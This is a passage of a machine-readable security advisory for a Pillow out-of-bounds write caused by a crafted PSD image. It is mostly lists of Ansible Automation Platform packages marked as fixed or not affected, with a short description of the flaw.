"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439170"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
